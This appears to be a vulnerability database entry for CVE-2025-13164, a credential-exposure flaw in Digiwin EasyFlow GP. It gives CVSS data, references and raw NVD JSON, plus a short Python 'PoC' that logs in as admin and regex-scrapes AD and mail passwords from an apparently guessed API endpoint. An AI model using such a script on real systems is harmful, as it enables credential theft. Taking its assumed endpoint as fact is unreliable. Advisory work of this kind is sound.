CVE-2025-13164

Description

EasyFlow GP developed by Digiwin has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to obtain plaintext credentials of AD and system mail from the system frontend.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

EasyFlow GP (Digiwin) - 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13164 PoC - EasyFlow GP Credential Exposure
# Description: EasyFlow GP exposes AD and mail credentials in plaintext via frontend

import requests
import re

target_url = "http://target-easyflow-gp.com"

# Step 1: Login as privileged user
login_url = f"{target_url}/login"
credentials = {
    "username": "admin",
    "password": "password"
}

session = requests.Session()
response = session.post(login_url, data=credentials)

# Step 2: Access admin page or API endpoint that exposes credentials
admin_url = f"{target_url}/api/system/config"
response = session.get(admin_url)

# Step 3: Extract plaintext credentials from response
if response.status_code == 200:
    # Look for credential patterns in response
    ad_creds = re.findall(r'ad_username[":\s]+([^,"}]+)', response.text)
    ad_passwords = re.findall(r'ad_password[":\s]+([^,"}]+)', response.text)
    mail_creds = re.findall(r'mail_username[":\s]+([^,"}]+)', response.text)
    mail_passwords = re.findall(r'mail_password[":\s]+([^,"}]+)', response.text)
    
    print("Exposed AD Credentials:")
    for u, p in zip(ad_creds, ad_passwords):
        print(f"  Username: {u}, Password: {p}")
    
    print("Exposed Mail Credentials:")
    for u, p in zip(mail_creds, mail_passwords):
        print(f"  Username: {u}, Password: {p}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13164
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13164
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13164/
[4] VulDB https://vuldb.com/cve/CVE-2025-13164
[5] https://www.twcert.org.tw/en/cp-139-10504-23f4c-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10503-a66fe-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13164", "sourceIdentifier": "[email protected]", "published": "2025-11-17T08:16:22.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EasyFlow GP developed by Digiwin has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to obtain plaintext credentials of AD and system mail from the system frontend."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10504-23f4c-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10503-a66fe-1.html", "source": "[email protected]"}]}}